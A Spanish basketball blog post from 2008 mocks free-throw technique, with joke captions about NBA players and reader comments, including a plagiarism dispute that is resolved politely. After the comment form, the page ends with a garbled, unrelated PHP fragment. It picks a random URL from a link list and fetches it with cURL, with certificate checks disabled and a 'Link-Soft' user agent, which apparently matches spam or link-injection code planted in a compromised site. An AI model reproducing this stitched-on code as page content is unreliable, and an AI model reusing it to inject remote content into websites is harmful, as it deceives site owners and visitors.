El tiro libre: manual de acoso y derribo

18 de April de 2008 por txusma

¿Hay algo en el baloncesto que parezca a la vez tan fácil y complicado como un tiro libre? Nadie te molesta, nadie te puntea el tiro, nadie evita que lances. Tienes todo el tiempo del mundo. Puedes botar el balón 6 veces, cantar “por lo bajini”, rezar un Padrenuestro, lanzar un beso a la canasta si lo deseas, que nadie te lo impedirá. Tú sólo concéntrate en meter el lanzamiento. O, al menos, en tirar bien.

Porque, ¿todos conocéis la mejor manera de llevar a cabo un tiro libre? Hagamos un pequeño repaso:

– Lo primero será tener una correcta mecánica del tiro. “Ufff… veo trabajo contigo, Desmond. Mucho trabajo”

El balón debe colocarse un poco más alto que la sien. “¡He dicho un poco más alto!¡¡Sólo un poco!!”

– El brazo que lanza debe estar flexionado, formando un ángulo recto con el antebrazo, paralelo al suelo. El codo, en línea con la puntera del pie y la rodilla. “No te esfuerces Red. No hay nada que hacer con estos 2.”

El brazo contrario estará también flexionado y apoya la mano lateralmente sobre el balón con el codo ligeramente abierto. “En tu caso, Shaq, haz lo que quieras. ¡Total, el resultado va a ser el mismo!”

– El cuello está recto y relajado, la cabeza erguida y con la vista puesta en el aro. Se debe mirar el balón entre los dos brazos y por debajo del balón. “¡Pero abre los ojos, hombre! Sobradete tú, ¿no?”

– El último impulso debe darse con los dedos, que han de quedar abiertos y apuntando hacia el aro, con el brazo extendido, manteniendo esta posición unos instantes, normalmente hasta que el balón toca el aro o entra en él. “Ni impulso con los dedos, ni brazo extendido, ni mantener posición… ¡Ni siquiera tocar el aro! ¿Pero tú de dónde has salido?”

– El balón deberá seguir una trayectoria curva describiendo un amplio arco y evitando un avance excesivamente recto. “Di que sí, Marion. Hacerlo así sería demasiado fácil.”

– En el tiro libre no se debe saltar, debiendo permanecer sobre las puntas de los pies tras la extensión de las piernas. “¡Por favor! ¡Que alguien me arranque los ojos!”

Ninguna acción debe alterar nuestro equilibrio y estabilidad. “Eso es Kaman. Ni siquiera el árbitro. Tú sigue haciendo amigos”

Después de seguir estas simples instrucciones pueden pasar varias cosas, entre ellas que no toques aro:

o algún que otro suceso paranormal:

Lo importante es que no dejéis de practicar.

Comenta

18 comentarios a esta entrada

  1. Gallis dice:
    #1

    Que grande, Txus, que grande!!!

      Citar

  2. MagicJohnson32 dice:
    #2

    Juuuuuuuuuuuuuuuaaaaaaaaaaaaaaaaaaaaaaaaaasssssss ¡¡pero por diooos!!

      Citar

  3. TheDeerHunter dice:
    #3

    jajajajajaja
    jojo!!!

    cágate… ¿de dónde sacáis estas cosas???

      Citar

  4. duncan21 dice:
    #4

    genial, lo mejor es el mate sin tocar aro ni tablero de travis outlaw en el penultimo video, pero como coño haces eso??
    lo de no tocar aro en el tiro libre es un clásico. recuerdo uno que hizo varejao el año pasado creo. desde entonces en mi equipo es denominado “hacer un varejao”
    un saludo
    por cierto, ¿hay alguien que los tire a tablero?

      Citar

  5. Dantley dice:
    #5

    A tablero recuerdo un ruso, pero no recuerdo quien de la época de vete tú a saber cuando. Con deciros que el comentarista creo que era Héctor Quiroga. O lanzarlos a cuchara también.

    Impresionante documento, pedazo de Txusma ¡¡¡¡¡¡¡

      Citar

  6. blogcesto dice:
    #6

    Os diré de donde ha sacado este post que tanto os ha gustado. DE MI BLOG.

    La copia es un arte que siempre existirá lamentablemente, pero duele mucho hacer un artículo y ver una copia tremenda en otro sitio y que ni hagan referencia a tu trabajo. Es penoso trabajar y que otros se monten en el carro sin hacer nada.

    Este post fue publicado el 18 de abril. Que curioso! El 24 de marzo en mi Blog (htttp://www.blogcesto.com) publicaba el ORIGINAL “Tiro Libre”

    Miradlo aquí: http://blogcesto.wordpress.com/2008/03/24/tiro-libre/

    ¿Casualidad? No creo. Me hubiese gustado hablarlo personalmente con los responsables de este blog, que por otra parte me parece muy bueno.

    Lo que no me parece tan bueno es apropiarse de cosas creadas por otras personas.

    Saludos desde Blogcesto.

      Citar

  7. blogcesto dice:
    #7

    Seguro que no publicaréis mi comentario. Es lógico. Nadie tira piedras sobre su propio tejado.

    Pero os pido por favor un poco de decencia y que deis la cara.

    Mi email es blogcesto@gmail.com

      Citar

  8. Copia « Todo el baloncesto en Blogcesto.com dice:
    #8
  9. txusma dice:
    #9

    Hola Blogcesto,

    como autor del articulo te puedo asegurar q hasta el dia de hoy no conocia tu blog. Hace tiempo alguien colgo el video de los tiros libres de Chuck Hayes y a partir de ahi, en YouTube no es tan complicado ir buscando otros tiros libres parecidos o curiosos. Si te fijas, los 2 articulos tan solo tienen igual los videos (q es la salsa, vale) pero es que en YouTube no hay mas videos q estos!

    Ahora te envio un mail donde te doy una prueba concluyente de q el articulo no es una copia. Siento q lo hayas pensado asi.

    saludos

      Citar

  10. Pow_Brolin dice:
    #10

    Supongo que el autor del articulo ya te envio los datos pertinentes donde se demuestra que la acusacion es falsa.

    Pero para quien quiera comprobarlo in situ http://foronbas.mforos.com/133928/6780737-tiros-libres/ -> En nuestro foro se comenzo a gestar la idea del articulo … concretamente el 8 de Marzo. Por lo tanto antes de lanzar una acusacion tan seria podrias indagar o preguntar a los administradores del Blog para no ir difamando a la ligera.

      Citar

  11. blogcesto dice:
    #11

    Hola, soy uno de los creadores de Blogcesto y os he dejado contestación en mi Blog. Por cuestión de ahorrar tiempo os dejo la dire y ya la leeis. Gracias por contestar.

    http://blogcesto.wordpress.com/2008/04/21/copia/#comments

    Saludos!

      Citar

  12. blogcesto dice:
    #12

    Por cierto, en cuanto me contestes y dejemos el asunto por zanjado borraré de inmediato el post donde os acusaba de copiar.

    Saludos y enhorabuena por el Blog.

    Yo también lo conocí hoy, pero ojalá lo hubiera conocido de otra manera jeje.

      Citar

  13. txusma dice:
    #13

    Contestado el comentario, pero no borres la entrada tan solo modificala de manera q al menos los comentarios permanezcan. Creo q puede ser una prueba de como se resuelven esta clase de conflictos.

    un saludo y mucho exito!

      Citar

  14. blogcesto dice:
    #14

    Tienes toda la razón. Creo que has dado un ejemplo a seguir. Ojala se resolvieran así los problemas; a través del diálogo.

    Moficaré el post para dejar claro que todo ha sido una serie de casualidades.

    Un saludo y seguid adelante!

      Citar

  15. planetbasket.net dice:
    #15
  16. dsromero dice:
    #16

    llegue aquí desde la entrada de los pasos muy buenas las dos pero en esta hay dos videos qeu han sido quitados de youtube.

    Felicidades por el blog

      Citar

  17. admin dice:
    #17

    Gracias por el aviso. A ver si conseguimos encontrarlos de nuevo…

      Citar

  18. TheDeerHunter dice:
    #18

    creo que habrá que incluir este tutube para la colección:

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>